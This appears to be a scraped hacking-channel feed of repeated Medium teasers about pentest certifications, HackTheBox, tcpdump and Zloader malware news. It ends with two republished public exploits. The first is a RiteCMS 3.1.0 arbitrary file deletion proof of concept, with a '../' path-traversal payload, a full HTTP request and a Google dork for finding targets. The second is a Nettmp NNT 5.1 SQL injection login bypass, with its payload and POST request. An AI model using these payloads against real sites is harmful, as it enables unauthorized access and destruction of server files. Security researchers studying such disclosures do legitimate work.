Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
eCPPT: eLearnSecurity Certified Professional Penetration Tester — Review
https://cdn-images-1.medium.com/max/2600/1*ywAvWVzwDv9MKlA8uXEPag.png
I recently completed my eCPPT exam and submitted my report for grading. At the time of writing, I am yet to recieve my results, but I…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
eCPPT: eLearnSecurity Certified Professional Penetration Tester — Review
https://cdn-images-1.medium.com/max/2600/1*ywAvWVzwDv9MKlA8uXEPag.png
I recently completed my eCPPT exam and submitted my report for grading. At the time of writing, I am yet to recieve my results, but I…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
eCPPT: eLearnSecurity Certified Professional Penetration Tester — Review
I recently completed my eCPPT exam and submitted my report for grading. At the time of writing, I am yet to recieve my results, but I…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Backdoor — HackTheBox Machine Write-Up
https://cdn-images-1.medium.com/max/1920/1*uOF3vXRR7ZOWPEXp-si1yg.png
Here’s The Way I Was Shown About How To Get Into The Box.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Backdoor — HackTheBox Machine Write-Up
https://cdn-images-1.medium.com/max/1920/1*uOF3vXRR7ZOWPEXp-si1yg.png
Here’s The Way I Was Shown About How To Get Into The Box.
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Backdoor — HackTheBox Machine Write-Up
Here’s The Way I Was Shown About How To Get Into The Box.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Hacker — O pirata digital
https://cdn-images-1.medium.com/max/970/0*2WW4T7OIpn2q9AAK.jpg
Segurança digital ou segurança da informação é o nome dado para a prática de proteger dispositivos pessoais ou de
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Hacker — O pirata digital
https://cdn-images-1.medium.com/max/970/0*2WW4T7OIpn2q9AAK.jpg
Segurança digital ou segurança da informação é o nome dado para a prática de proteger dispositivos pessoais ou de
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Hacker — O pirata digital
Segurança digital ou segurança da informação é o nome dado para a prática de proteger dispositivos pessoais ou de
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TCPdump Capturing Network Traffic | Analyzing | 3-Way Handshake
Welcome again ! in this article we will talk about tcpdump tool ? introduction and basic commands that attackers use , with scenarios…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
TCPdump Capturing Network Traffic | Analyzing | 3-Way Handshake
Welcome again ! in this article we will talk about tcpdump tool ? introduction and basic commands that attackers use , with scenarios…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
TCPdump Capturing Network Traffic | Analyzing | 3-Way Handshake
Welcome again ! in this article we will talk about tcpdump tool ? introduction and basic commands that attackers use , with scenarios…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Are You Safe??
https://cdn-images-1.medium.com/max/768/0*ZlYRfhifgj3OG0fc
चाणक्य ने कई साल पहले कहाँ था, “आदमी को शक्तीशाली बनने के लिए चार चिजों की जरूरत पडती है।
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Are You Safe??
https://cdn-images-1.medium.com/max/768/0*ZlYRfhifgj3OG0fc
चाणक्य ने कई साल पहले कहाँ था, “आदमी को शक्तीशाली बनने के लिए चार चिजों की जरूरत पडती है।
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Are You Safe??
चाणक्य ने कई साल पहले कहाँ था, “आदमी को शक्तीशाली बनने के लिए चार चिजों की जरूरत पडती है।
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Linux Fundamentals 1 Room
Welcome Again ! In this video we will talk about Linux fundamentals and commands that they’re very useful when it comes to cyber security …
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Linux Fundamentals 1 Room
Welcome Again ! In this video we will talk about Linux fundamentals and commands that they’re very useful when it comes to cyber security …
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Linux Fundamentals 1 Room
Welcome Again ! In this video we will talk about Linux fundamentals and commands that they’re very useful when it comes to cyber security …
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Nueva campaña de malware bancario Zloader que aprovecha la verificación de firmas de Microsoft
https://cdn-images-1.medium.com/max/1600/0*tUUK92QsNaa7Vkbp
PUBLICADO EN 5 ENERO, 2022POR DPAB
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Nueva campaña de malware bancario Zloader que aprovecha la verificación de firmas de Microsoft
https://cdn-images-1.medium.com/max/1600/0*tUUK92QsNaa7Vkbp
PUBLICADO EN 5 ENERO, 2022POR DPAB
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Nueva campaña de malware bancario Zloader que aprovecha la verificación de firmas de Microsoft
PUBLICADO EN 5 ENERO, 2022POR DPAB
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
RiteCMS 3.1.0 Arbitrary File Deletion
https://3.bp.blogspot.com/-UEPmQpzFyCs/WWlvQSuTgiI/AAAAAAAAINA/LFaHvgtClFA67K--PZO5ZJSS69Dsl8UBACLcBGAs/s1600/h31.png
RiteCMS versions 3.1.0 and below suffer from an arbitrary file deletion vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
RiteCMS 3.1.0 Arbitrary File Deletion
https://3.bp.blogspot.com/-UEPmQpzFyCs/WWlvQSuTgiI/AAAAAAAAINA/LFaHvgtClFA67K--PZO5ZJSS69Dsl8UBACLcBGAs/s1600/h31.png
RiteCMS versions 3.1.0 and below suffer from an arbitrary file deletion vulnerability.
MD5 |
07a5012d72060344e0ae19361f61dc68Download
# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <=
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Reference: https://gist.github.com/faisalfs10x/5514b3eaf0a108e27f45657955e539fd
################
# Description #
################
# RiteCMS version 3.1.0 and below suffers from an arbitrary file deletion vulnerability in Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has the proper permissions to delete). Furthermore, an attacker might leverage the capability of arbitrary file deletion to circumvent certain webserver security mechanisms such as deleting .htaccess file that would deactivate those security constraints.
#####################################################
# PoC to delete secretConfig.conf file in web root #
#####################################################
Steps to Reproduce:
1. Login as admin
2. Go to File Manager
3. Delete any file
4. Intercept the request and replace current file name to any files on the server via parameter "delete".
# Assumed there is a secretConfig.conf file in web root
PoC: param delete - Deleting secretConfig.conf file in web root, so the payload will be "../secretConfig.conf"
Request:
========
GET /ritecms.v3.1.0/admin.php?mode=filemanager&directory=media&delete=../secretConfig.conf&confirmed=true HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager
Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
RiteCMS 3.1.0 Arbitrary File Deletion
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Nettmp NNT 5.1 SQL Injection
https://2.bp.blogspot.com/-eFdyzozIeoQ/WWlvJBrapBI/AAAAAAAAIL0/M7DCjoWzT04QjJ3gTxRIZh_KH17rlqHhwCLcBGAs/s1600/h146.png
Nettmp NNT version 5.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Nettmp NNT 5.1 SQL Injection
https://2.bp.blogspot.com/-eFdyzozIeoQ/WWlvJBrapBI/AAAAAAAAIL0/M7DCjoWzT04QjJ3gTxRIZh_KH17rlqHhwCLcBGAs/s1600/h146.png
Nettmp NNT version 5.1 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
MD5 |
ecd2cd7737dd5aec54368728d4596e0aDownload
# Exploit Title: Nettmp NNT 5.1 - SQLi Authentication Bypass
# Date: 23/12/2021
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://wiki.nettemp.tk
# Software Link: https://wiki.nettemp.tk
# Version: nettmp NNT
# Tested on: Linux (Ubuntu 20.04)
Payload:
username: 1' or 1=1;--
password: \
Proof of Concept:
POST /index.php?id=status HTTP/1.1
Host: vuln.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: http://vuln.com
DNT: 1
Connection: close
Referer: http://vulnIP/index.php?id=status
Cookie: PHPSESSID=v8hmih4u92mftquen8gtvpstsq
Upgrade-Insecure-Requests: 1
username=1%27+or+1%3D1%3B--&password=%5C&form_login=log
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Nettmp NNT 5.1 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.